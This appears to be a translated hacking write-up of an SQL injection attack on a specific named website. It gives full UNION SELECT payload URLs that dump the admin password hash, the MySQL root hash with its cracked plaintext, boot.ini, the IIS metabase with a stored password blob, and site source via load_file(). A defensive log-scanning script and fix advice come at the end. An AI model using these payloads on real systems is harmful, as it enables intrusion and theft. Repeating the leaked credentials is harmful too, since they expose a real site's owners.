PHP/MySQL injection: using load_file() to read the IIS configuration file
Let's look at an injection point:
http://www. . Cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(database(),0x5c,user(),0x5c,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

Echo: flier_dbase\[email protected]\5.0.22-community-nt

If the injection point is the first vulnerability, then the administrator having the web site connect as root is the second. Table names:

http://www. . Cn/news_detail.php?newsid=1+union+select+1,2,3,4,5,6,group_concat(distinct+table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_schema=0x666c6965725f6462617365

Data returned: pub_config, pub_tree, pub_webmaster, web_img, web_keys, web_ly, web_news, web_news_review

The fields of pub_webmaster:

http://www. . Cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,group_concat(distinct+column_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_name=0x7075625f7765626d6173746572

Data returned: webmasterid, username, userpwd, loginnum, ip, lasttime, tree, name, dtime, sex, jobs

Now the administrator data:

http://www. . cn/nEws_detail.php?newsid=-1+union+select+1,2,3,4,5,6,group_concat(DISTINCT+USERNAME,0X5F,USERPWD),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+pub_webmaster

Returned: admin_9b45d683e499e7bdyfh_7a57a5a743894a0e. Here is the third vulnerability: the weak password admin.

Since the back-end address could not be found, simply dump the MySQL administrator password instead:

http://www. . Cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(user,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

Data returned: root*CB26B0546CADD30FC2432C095A6A3D54FA3C2FFD

The database has one account; if its hash cannot be cracked, do we give up? Not at all. First, I cracked it: for an eight-character password of letters plus symbols, the school's distributed password-cracking system managed without strain.

But an eight-character password of letters plus symbols is not a weak password either, so for now it does not count as a vulnerability. (The hash *cb26b0546cadd30fc2432c095a6a3d54fa3c2ffd corresponds to the plaintext QWEASD)@.)

Second, there are other routes. Requesting an arbitrary path returns the IIS 6 default 404 page, which tells us the server environment is Windows + IIS 6 + PHP + MySQL. First hex-encode the path string C:\\boot.ini, which gives 0x633a5c5c626f6f742e696e69, then:

http://www. . Cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0x633a5c5c626f6f742e696e69),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

The echo is:

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\Windows
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\windows="WINDOWS Server 2003, Enterprise" /fastdetect /noexecute=optout

So load_file() can read files, but on its own that seems of little use. Not necessarily: since this is IIS 6, loading the path c:\\windows\\system32\\inetsrv\\metabase.xml gives the site configuration.

Note: in Windows file paths the backslash must be doubled; with a single backslash load_file() will probably fail. The reason is that the Windows separator is the backslash \ (top-left to bottom-right), whereas Linux uses the forward slash / (bottom-left to top-right). Put a t after a backslash in a Windows path and you get \t, which means something in programming; what about \n, or \'? Exactly: the backslash is consumed as an escape and disappears from the path. A doubled backslash \\ is the real single backslash, and if you need to output a doubled backslash you have to write four, \\\\. Annoying, isn't it?

The final injection statement is:

http://www.fly-er.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0X633A5C5C77696E646F77735C5C73797374656D33325C5C696E65747372765C5C4D657461426173652E786D6C),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

which echoes the metabase. The configuration lines that matter are mainly these:
```xml
<IIsWebServer Location="/LM/W3SVC/2125961364"
    AuthFlags="0"
    LogExtFileFlags="LogExtFileDate | LogExtFileTime | LogExtFileClientIp | LogExtFileUriStem | LogExtFileUriQuery | LogExtFileHttpStatus | LogExtFileWin32Status | LogExtFileServerPort | LogExtFileUserAgent | LogExtFileHttpSubStatus"
    LogFileDirectory="E:\flylog"
    LogFileLocaltimeRollover="FALSE"
    LogFilePeriod="1"
    LogFileTruncateSize="20971520"
    LogPluginClsid="{FF160663-DE82-11CF-BC0A-00AA006111E0}"
    ServerAutoStart="TRUE"
    ServerBindings=":80:fly-er.com.cn
:80:www.fly-er.com.cn"
    ServerComment="fly-er.com.cn"
>
</IIsWebServer>
```
And also:

```xml
<IIsWebVirtualDir Location="/LM/W3SVC/2125961364/root"
    AccessFlags="AccessRead | AccessWrite | AccessScript"
    AppFriendlyName="默认应用程序"
    AppIsolated="2"
    AppRoot="/LM/W3SVC/2125961364/Root"
    AuthFlags="AuthAnonymous | AuthNTLM"
    DefaultDoc="yindao.html,index.html,index.php,Default.htm,Default.asp,index.htm"
    DirBrowseFlags="DirBrowseShowDate | DirBrowseShowTime | DirBrowseShowSize | DirBrowseShowExtension | DirBrowseShowLongDate | EnableDefaultDoc"
    Path="F:\web\2010716\new_flyer"
    UNCPassword="49634462500000000600000040000000894077f761d33600623e24d0e5dfbe254f63ee6490a3af6f918760ac2fbd00627e07669149f74641659a4383366f9edefd9c02f6555c8692c1c93d2483008b9721cbdae4fac9a380"
>
</IIsWebVirtualDir>
```
Here we construct:

http://www. . Cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0x463a5c5c7765625c5c323031303731365c5c6e65775f666c7965725c5c696e6465782e706870),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

and right-click to view the page source.

Note: when using load_file() it is best to wrap it in hex(), as hex(load_file(xxxxxxx)). I once ran into a site whose home page code had some problem I never located, with the injection point on the home page itself. I used the home page to load_file() the home page file without wrapping it in hex(), and the page went into a loop, something like this: index contains an iframe, the iframe loads index, that index again contains the iframe loading index, and so on until the machine's resources are exhausted. Whether that site really had such an iframe I do not know, but nesting of that kind does produce an endless loop, so I recommend wrapping load_file() in hex(). What interests me more in index is this piece of code:

```php
require( 'admin_flier/common/function.php' );
require( 'admin_flier/lib/class/form.class.php' );
require( 'admin_flier/lib/class/db.class.php' );
require( 'admin_flier/lib/class/page.class.php' );
include( 'inc/head.php' );
```
Oh, isn't this the back-end address? Clearly the back end is not secure enough. Even when the back-end address is hidden so that scanners cannot find it, that is no reason to relax its security, is it?
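As an added defensive example (not code from the original post), the following Python scans IIS 6 W3C log lines of the kind the metabase above writes to E:\flylog; because LogExtFileUriQuery is set, every injected query string from this walkthrough is recorded there. The log lines are constructed samples that reuse the request shapes seen above, and the field order assumed is date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS 6 W3C log lines (sample data, not from the original post). The
# metabase above logs cs-uri-query, so the injected SQL ends up in these files.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-08-01 10:00:01 203.0.113.5 GET /news_detail.php newsid=17 200
2010-08-01 10:00:09 203.0.113.5 GET /news_detail.php newsid=-1+union+select+1,2,3,4,5,6,concat(database(),0x5c,user(),0x5c,version()),8,9 200
2010-08-01 10:00:31 203.0.113.5 GET /news_detail.php newsid=-1+union+select+1,2,3,4,5,6,load_file(0x633a5c5c626f6f742e696e69),8,9 200
2010-08-01 10:01:02 203.0.113.5 GET /news_detail.php newsid=-1+union+select+1,2,3,4,5,6,hex(load_file(0x463a5c5c7765625c5c323031303731365c5c6e65775f666c7965725c5c696e6465782e706870)),8,9 200
"""

# Keywords that appear at every step of the walkthrough above.
SUSPICIOUS = re.compile(
    r"union\s+select|load_file\s*\(|information_schema|mysql\.user|group_concat",
    re.IGNORECASE)
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})", re.IGNORECASE)


def decode_hex_literals(query):
    """Turn MySQL 0x... literals back into text, e.g. the file path handed to load_file()."""
    decoded = []
    for h in HEX_LITERAL.findall(query):
        try:
            text = bytes.fromhex(h).decode("ascii")
        except ValueError:          # odd length or non-ASCII bytes: not a string literal
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def scan_iis_log(log_text):
    """Return (c-ip, cs-uri-stem, matched keyword, decoded literals) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):          # skip W3C directive lines
            continue
        fields = line.split(" ")
        if len(fields) < 7:
            continue
        c_ip, stem, raw_query = fields[2], fields[4], fields[5]
        query = unquote_plus(raw_query)               # '+' in the log was a space in the SQL
        match = SUSPICIOUS.search(query)
        if match:
            findings.append((c_ip, stem, match.group(0).lower(), decode_hex_literals(query)))
    return findings
```

scan_iis_log(SAMPLE_LOG) flags the last three requests and decodes the load_file() targets to c:\\boot.ini and the index.php path. On the server side the fix is to pass newsid through a parameterized query and to run the site on a MySQL account without the FILE privilege rather than as root.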